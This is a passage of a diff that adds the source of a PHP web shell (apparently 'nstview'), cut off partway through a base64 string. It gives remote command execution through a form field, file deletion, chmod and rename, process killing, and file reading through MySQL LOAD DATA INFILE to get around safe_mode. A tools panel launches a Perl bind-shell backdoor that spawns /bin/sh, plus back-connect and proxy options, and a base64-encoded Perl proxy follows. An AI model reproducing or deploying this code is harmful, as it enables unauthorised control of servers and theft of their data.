+<input type=hidden name=login value='$login'>
+<input type=hidden name=pass value='$pass'>
+<input type=hidden name=adress value='$adress'>
+<input type=hidden name=conn value=1>
+<input type=hidden name=baza value=1>
+<input type=hidden name=p value=sql>
+<input type=hidden name=tbl value='$tbl'>
+ [<a href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>]
+</form></td></tr></table>";
+$vn=$_GET['vn'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+$result1= mysql_query($query);
+print $del_result;
+print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>";
+for ($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);
+$type  = mysql_field_type($result, $i);
+$len  = mysql_field_len($result, $i);
+print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>";
+}
+print "</tr><pre>";
+
+while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach($mn as $key=>$inside){
+$buffer1 .= "`$key`='".adds($inside)."' AND ";
+$b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)."&nbsp;</td>";
+}
+$buffer1  = substr($buffer1, 0, strlen($buffer1)-5);
+$buffer1  = base64_encode($buffer1);
+print "<td>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=delete_row value='$buffer1'>
+<input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'>
+</form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=edit_row value='$buffer1'>
+<input type=submit value=Edit style='border:1px;background-color:green;'>
+</form>
+</td>\r\n";
+print $b1;
+print "</tr>";
+unset($b1);
+unset($buffer1);
+}
+
+
+
+mysql_free_result($result);
+print "</table>";
+} #end vnutr
+print "</td></tr></table>";
+} # end $conn
+
+
+###   end of sql
+print "</tr></td></table> </td></tr></table>";
+print $copyr;
+die;
+}
+
+
+@$p=$_GET['p'];
+if(@$_GET['p']=="selfremover"){
+        print "<tr><td>";
+print "<font color=red face=verdana size=1>Are you sure?<br>
+<a href='$php_self?p=yes'>Yes</a> | <a href='$php_self?'>No</a><br>
+Remove: <u>";
+$path=__FILE__;
+print $path;
+print " </u>?</td></tr></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="NOT DELETED!!!";
+print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>";
+}else{$hmm="DELETED";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+
+
+
+if($os=="unix"){
+function fastcmd(){
+global $fast_commands;
+$c_f=explode("\n",$fast_commands);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh>";
+
+$c=substr_count($fast_commands," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os unix
+
+
+if($os=="win"){
+function fastcmd(){
+global $fast_commands_win;
+$c_f=explode("\n",$fast_commands_win);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh>";
+
+$c=substr_count($fast_commands_win," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands_win);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os win
+
+
+echo "
+<tr><td>";
+if(@$_GET['shell']=="1"){echo "<center>cmd<br>pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=shellForm method=post><input name=sh size=110></form></center><br>
+";
+if(@$_POST['sh']){
+$sh=$_POST['sh'];
+echo "<pre>";
+print `$sh`; echo "</pre>";}
+}
+
+if(@$_GET['shell']=="2"){
+echo "<center>cmd<br>
+pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=shellForm method=post><input name=sh size=110></form></center><br>";
+if(@$_POST['sh']){
+$sh=$_POST['sh'];
+echo "<pre>"; print `$sh`; echo "</pre>";}
+echo $copyr;
+exit;}
+
+if(@$_GET['delfl']){
+@$delfolder=$_GET['delfolder'];
+echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
+(All files must be writable)<br>
+<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br>
+";
+echo $copyr;
+exit;
+}
+
+
+$mkdir=$_GET['mkdir'];
+if($mkdir){
+print "<br><b>Create Folder in $d :</b><br><br>
+<form method=post>
+New folder name:<br>
+<input name=dir_n size=30>
+</form><br>
+";
+if($_POST['dir_n']){
+mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
+print "<b><font color=green>Directory created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$mkfile=$_GET['mkfile'];
+if($mkfile){
+print "<br><b>Create file in $d :</b><br><br>
+<form method=post>
+File name:<br>
+(example: hello.txt , hello.php)<br>
+<input name=file_n size=30>
+</form><br>
+";
+if($_POST['file_n']){
+$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
+fwrite($fp,"");
+print "<b><font color=green>File created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$ps_table=$_GET['ps_table'];
+if($ps_table){
+
+if($_POST['kill_p']){
+exec("kill -9 ".$_POST['kill_p']);
+}
+
+$str=`ps aux`;
+preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
+print "<br><b>PS Table :: Fast kill program<br><br></b>";
+print "<center><table border=1>";
+for($i=0; $i<count($matches[3]); $i++){
+$expl=explode(" ",$matches[0][$i]);
+print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>";
+}#end of for
+print "</table></center><br><br>";
+unset($str);
+print $copyr;
+die;
+}#end of ps table
+
+
+$read_file_safe_mode=$_GET['read_file_safe_mode'];
+if($read_file_safe_mode){
+
+if(!isset($_POST['l'])){$_POST['l']="root";}
+
+print "<br>
+Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br>
+<form method=post>
+<table>
+<tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr>
+<tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr>
+<tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table>
+(example: /etc/hosts)<br>
+<input name=read_file size=45><br>
+<input type=submit value='Show content'>
+</form>
+<br>";
+
+if($_POST['read_file']){
+$read_file=$_POST['read_file'];
+@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>");
+mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>");
+mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
+$query = "SELECT * FROM tmp_file";
+$result = mysql_query($query) or die("<font color=red>".mysql_error()."</font>");
+print "<b>File content</b>:<br><br>";
+for($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);}
+while($line=mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach ($line as $key =>$col_value) {
+print htmlspecialchars($col_value)."<br>";}}
+mysql_free_result($result);
+mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+}
+
+
+print $copyr;
+die;
+}#end of read_file_safe_mode
+
+
+# sys
+$wich_f=$_GET['wich_f'];
+$delete=$_GET['delete'];
+$del_f=$_GET['del_f'];
+$chmod=$_GET['chmod'];
+$ccopy_to=$_GET['ccopy_to'];
+
+
+# delete
+if(@$_GET['del_f']){
+if(!isset($delete)){
+print "<font color=red>Delete this file?</font><br>
+<b>$d/$wich_f<br><br></b>
+<a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a>
+";}
+if($delete==1){
+unlink($d."/".$del_f);
+print "<b>File: <font color=green>$d/$del_f DELETED!</font></b>
+<br><b> <a href='$php_self?d=$d'># BACK</a>
+";
+}
+echo $copyr;
+exit;
+}
+
+
+# copy to
+if($ccopy_to){
+$wich_f=$_POST['wich_f'];
+$to_f=$_POST['to_f'];
+print "<font color=green>Copy file:<br>
+$d/$ccopy_to</font><br>
+<br>
+<form method=post>
+File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br>
+To:<br><input name=to_f size=100 value='$d/nst_$ccopy_to'><br><br>
+<input type=submit value=Copy></form><br><br>
+";
+
+if($to_f){
+@copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! maybe folder is not writable</font>");
+print "<font color=green><b>Copy success!!!</b></font><br>";
+}
+
+echo $copyr;
+exit;
+}
+
+
+# chmod
+if(@$_GET['chmod']){
+$perms = @fileperms($d."/".$wich_f);
+print "<b><font color=green>CHMOD file $d/$wich_f</font><br>
+<br><center>This file chmod is</b> ";
+print perm($perms);
+print "</center>
+<br>";
+$chmd=<<<HTML
+
+<script>
+<!--
+
+function do_chmod(user) {
+        var field4 = user + "4";
+        var field2 = user + "2";
+        var field1 = user + "1";
+        var total = "t_" + user;
+        var symbolic = "sym_" + user;
+        var number = 0;
+        var sym_string = "";
+
+        if (document.chmod[field4].checked == true) { number += 4; }
+        if (document.chmod[field2].checked == true) { number += 2; }
+        if (document.chmod[field1].checked == true) { number += 1; }
+
+        if (document.chmod[field4].checked == true) {
+                sym_string += "r";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field2].checked == true) {
+                sym_string += "w";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field1].checked == true) {
+                sym_string += "x";
+        } else {
+                sym_string += "-";
+        }
+
+        if (number == 0) { number = ""; }
+        document.chmod[total].value = number;
+        document.chmod[symbolic].value = sym_string;
+
+        document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value;
+        document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value;
+}
+//-->
+</script>
+
+
+
+<form name="chmod" method=post>
+<p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr>
+        <tr bgcolor="gray">
+                <td align="left"><b>Permission</b></td>
+                <td align="center"><b>Owner</b></td>
+                <td align="center"><b>Group</b></td>
+                <td align="center"><b>Other</b></td>
+                <td bgcolor="#dddddd" rowspan="4"> </td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Read</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Write</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Execute</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Octal:</td>
+                <td align="center"><input type="text" name="t_owner" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_group" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_other" value="" size="1"></td>
+                <td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Symbolic:</td>
+                <td align="center"><input type="text" name="sym_owner" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_group" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_other" value="" size="3"></td>
+                <td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td>
+        </tr>
+</table></td></tr></table></p>
+HTML;
+
+print "<center>".$chmd."
+
+<b>$d/$wich_f</b><br><br>
+<input type=submit value=CHMOD></form>
+</center>
+</form>
+";
+$t_total=$_POST['t_total'];
+if($t_total){
+chmod($d."/".$wich_f,$t_total);
+print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>";
+print "<a href='$php_self?d=$d'># BACK</a><br><br>";
+}
+echo $copyr;
+exit;
+}
+
+# rename
+if(@$_GET['rename']){
+print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br>
+<center>
+<form method=post>
+<b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br>
+<input name=rto size=40 value='$wich_f'><br><br>
+<input type=submit value=RENAME>
+</form>
+";
+
+@$rto=$_POST['rto'];
+
+if($rto){
+$fr1=$d."/".$wich_f;
+$fr1=str_replace("//","/",$fr1);
+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+
+rename($fr1,$to1);
+print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>";
+
+echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">";
+
+}
+
+echo $copyr;
+exit;
+}
+
+
+
+
+if(@$_GET['deldir']){
+@$dir=$_GET['dir'];
+function deldir($dir)
+{
+$handle = @opendir($dir);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$dir/$ff")){
+deldir("$dir/$ff");
+}else{
+@unlink("$dir/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($dir)){
+@$success = true;}
+return @$success;
+}
+$dir=@$dir;
+deldir($dir);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">";
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="tools"){
+        # unix
+if($os=="unix"){
+print "
+<center><br>
+<font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.</b><br></font>
+<table border=1>
+<tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr>
+<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr>
+<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr>
+<tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr>
+<tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr>
+</table>
+</center>
+<br><Br>
+";
+}#end of unix
+
+
+if($_POST['perl_bd']){
+$port=$_POST['port'];
+$perl_bd_scp = "
+use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
+setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY));
+listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);}
+open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
+close X;}}";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("perl /tmp/nst_perl_bd.pl &");
+unlink("/tmp/nst_perl_bd.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("perl .nst_bd_tmp/nst_perl_bd.pl &");
+unlink(".nst_bd_tmp/nst_perl_bd.pl");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_bd
+
+if($_POST['perl_proxy']){
+$port=$_POST['port'];
+$perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4vcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtIGh0dHAgcHJveHkgc2VydmVyLiB6YXB1c2thamVtOiBwZXJsIHByb3h5LnBsCTgxODEgbHVib2ogcG9ydCB2aTZpIDEwMjQtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KI3JlcXVpcmUgInN5cy9zb2NrZXQucGgiOw0KdXNlIFNvY2tldDsNCnNyYW5kICh0aW1lfHwkJCk7DQojLS0tICBEZWZpbmUgYSBmcmllbmRseSBleGl0IGhhbmRsZXINCiRTSUd7J0tJTEwnfSA9ICRTSUd7UVVJVH0gPSAkU0lHe0lOVH0gPSAnZXhpdF9oYW5kbGVyJzsNCnN1YiBleGl0X2hhbmRsZXIgew0KICAgIHByaW50ICJcblxuIC0tLSBQcm94eSBzZXJ2ZXIgaXMgZHlpbmcgLi4uXG5cbiI7DQogICAgY2xvc2UoU09DS0VUKTsNCiAgICBleGl0Ow0KDQp9DQojLS0tICBTZXR1cCBzb2NrZXQNCg0KJHwgPSAxOw0KJHByb3h5X3BvcnQgPSBzaGlmdChAQVJHVik7DQokcHJveHlfcG9ydCA9IDgxODEgdW5sZXNzICRwcm94eV9wb3J0ID1+IC9cZCsvOw0KDQokc29ja2V0X2Zvcm1hdCA9ICdTIG4gYTQgeDgnOw0KJmxpc3Rlbl90b19wb3J0KFNPQ0tFVCwgJHByb3h5X3BvcnQpOw0KJGxvY2FsX2hvc3QgPSBgaG9zdG5hbWVgOw0KY2hvcCgkbG9jYWxfaG9zdCk7DQokbG9jYWxfaG9zdF9pcCA9IChnZXRob3N0YnluYW1lKCRsb2NhbF9ob3N0KSlbNF07DQpwcmludCAiIC0tLSBQcm94eSBzZXJ2ZXIgcnVubmluZyBvbiAkbG9jYWxfaG9zdCBwb3J0OiAkcHJveHlfcG9ydCBcblxuIjsNCiMtLS0gIExvb3AgZm9yZXZlciB0YWtpbmcgcmVxdWVzdHMgYXMgdGhleSBjb21lDQp3aGlsZSAoMSkgew0KIy0tLSAgV2FpdCBmb3IgcmVxdWVzdA0KICAgIHByaW50ICIgLS0tIFdhaXRpbmcgdG8gYmUgb2Ygc2VydmljZSAuLi5cbiI7DQogICAgKCRhZGRyID0gYWNjZXB0KENISUxELFNPQ0tFVCkpIHx8IGRpZSAiYWNjZXB0ICQhIjsNCiAgICAoJHBvcnQsJGluZXRhZGRyKSA9ICh1bnBhY2soJHNvY2tldF9mb3JtYXQsJGFkZHIpKVsxLDJdOw0KICAgIEBpbmV0YWRkciA9IHVucGFjaygnQzQnLCRpbmV0YWRkcik7DQogICAgcHJpbnQgIkNvbm5lY3Rpb24gZnJvbSAiLCBqb2luKCIuIiwgQGluZXRhZGRyKSwgIiAgcG9ydDogJHBvcnQgXG4iOw0KIy0tLSAgRm9yayBhIHN1YnByb2Nlc3MgdG8gaGFuZGxlIHJlcXVlc3QuDQojLS0tICBQYXJlbnQgcHJvY2VzIGNvbnRpbnVlcyBsaXN0ZW5pbmcuDQogICAgaWYgKGZvcmspIHsNCgl3YWl0OwkJIyBGb3Igbm93IHdlIHdhaXQgZm9yIHRoZSBjaGlsZCB0byBmaW5pc2gNCgluZXh0OwkJIyBXZSB3YWl0IHNvIHRoYXQgcHJpbnRvdXRzIGRvbid0IG1peA0KICAgIH0NCiMtLS0gIFJlYWQgZmlyc3QgbGluZSBvZiByZXF1ZXN0IGFuZCBhbmFseXplIGl0Lg0KIy0tLSAgUmV0dXJuIGFuZCBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QgbWV0aG9kLg0KICAgKCRmaXJzdCwkbWV0aG9kKSA9ICZhbmFseXplX3JlcXVlc3Q7DQojLS0tICBTZW5kIHJlcXVlc3QgdG8gcmVtb3RlIGhvc3QNCiAgICBwcmludCBVUkwgJGZpcnN0Ow0KICAgIHByaW50ICRmaXJzdDsNCiAgICB3aGlsZSAoPENISUxEPikgew0KCXByaW50ICRfOw0KCW5leHQgaWYgKC9Qcm94eS1Db25uZWN0aW9uOi8pOw0KCXByaW50IFVSTCAkXzsNCglsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvKTsNCiAgICB9DQogICAgaWYgKCRtZXRob2QgZXEgIlBPU1QiKSB7DQoJJGRhdGEgPSA8Q0hJTEQ+Ow0KCXByaW50ICRkYXRhOw0KCXByaW50IFVSTCAkZGF0YTsNCiAgICB9DQogICAgcHJpbnQgVVJMICJcbiI7DQojLS0tICBXYWl0IGZvciByZXNwb25zZSBhbmQgdHJhbnNmZXIgaXQgdG8gcmVxdWVzdG9yLg0KICAgIHByaW50ICIgLS0tIERvbmUgc2VuZGluZy4gUmVzcG9uc2U6IFxuXG4iOw0KICAgICRoZWFkZXIgPSAxOw0KICAgICR0ZXh0ID0gMDsNCiAgICB3aGlsZSAoPFVSTD4pIHsNCglwcmludCBDSElMRCAkXzsNCglpZiAoJGhlYWRlciB8fCAkdGV4dCkgewkgICAgICMgT25seSBwcmludCBoZWFkZXIgJiB0ZXh0IGxpbmVzIHRvIFNURE9VVA0KCSAgICBwcmludCAkXzsNCgkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15bXHNceDAwXSokLykgew0KCQkkaGVhZGVyID0gMDsNCgkgICAgfQ0KIwkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15Db250ZW50LXR5cGU6IHRleHQvKSB7DQojCQkkdGV4dCA9IDE7DQojCSAgICB9DQoJfQ0KICAgIH0NCiAgICBjbG9zZShVUkwpOw0KICAgIGNsb3NlKENISUxEKTsNCiAgICBleGl0OwkJCSMgRXhpdCBmcm9tIGNoaWxkIHByb2Nlc3MNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0JYW5hbHl6ZV9yZXF1ZXN0CQkJCQkJCS0tDQojLS0JCQkJCQkJCQktLQ0KIy0tCUFuYWx5emUgYSBuZXcgcmVxdWVzdC4gIEZpcnN0IHJlYWQgaW4gZmlyc3QgbGluZSBvZiByZXF1ZXN0LgktLQ0KIy0tCVJlYWQgVVJMIGZyb20gaXQsIHByb2Nlc3MgVVJMIGFuZCBvcGVuIGNvbm5lY3Rpb24uCQktLQ0KIy0tCVJldHVybiBhbiBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QJLS0NCiMtLQltZXRob2QuCQkJCQkJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBhbmFseXplX3JlcXVlc3Qgew0KIy0tLSAgUmVhZCBmaXJzdCBsaW5lIG9mIEhUVFAgcmVxdWVzdA0KICAgICRmaXJzdCA9IDxDSElMRD47DQoNCiAgICAkdXJsID0gKCRmaXJzdCA9fiBtfChodHRwOi8vXFMrKXwpWzBdOw0KICAgIHByaW50ICJSZXF1ZXN0IGZvciBVUkw6ICAkdXJsIFxuIjsNCg0KIy0tLSAgQ2hlY2sgaWYgZmlyc3QgbGluZSBpcyBvZiB0aGUgZm9ybSBHRVQgaHR0cDovL2hvc3QtbmFtZSAuLi4NCiAgICAoJG1ldGhvZCwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID0gDQoJKCRmaXJzdCA9fiBtIShHRVR8UE9TVHxIRUFEKSBodHRwOi8vKFteLzpdKyk6PyhcZCopISApOw0KIy0tLSAgSWYgbm90LCBiYWQgcmVxdWVzdC4NCiAgICANCiAgICBpZiAoISRyZW1vdGVfaG9zdCkgew0KCXByaW50ICRmaXJzdDsNCgl3aGlsZSAoPENISUxEPikgew0KCSAgICBwcmludCAkXzsNCgkgICAgbGFzdCBpZiAoJF8gPX4gL15bXHNceDAwXSokLyk7DQoJfQ0KCXByaW50ICJJbnZhbGlkIEhUVFAgcmVxdWVzdCBmcm9tICIsIGpvaW4oIi4iLCBAaW5ldGFkZHIpLCAiXG4iOw0KIwlwcmludCBDSElMRCAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluIiwiXG5cbiI7DQoJcHJpbnQgQ0hJTEQgIkkgZG9uJ3QgdW5kZXJzdGFuZCB5b3VyIHJlcXVlc3QuXG4iOw0KCWNsb3NlKENISUxEKTsNCglleGl0Ow0KICAgIH0NCiMtLS0gIElmIHJlcXVlc3RlZCBVUkwgaXMgdGhlIHByb3h5IHNlcnZlciB0aGVuIGlnbm9yZSByZXF1ZXN0DQogICAgJHJlbW90ZV9pcCA9IChnZXRob3N0YnluYW1lKCRyZW1vdGVfaG9zdCkpWzRdOw0KICAgIGlmICgoJHJlbW90ZV9pcCBlcSAkbG9jYWxfaG9zdF9pcCkgJiYgKCRyZW1vdGVfcG9ydCBlcSAkcHJveHlfcG9ydCkpIHsNCglwcmludCAkZmlyc3Q7DQoJd2hpbGUgKDxDSElMRD4pIHsNCgkgICAgcHJpbnQgJF87DQoJICAgIGxhc3QgaWYgKCRfID1+IC9eW1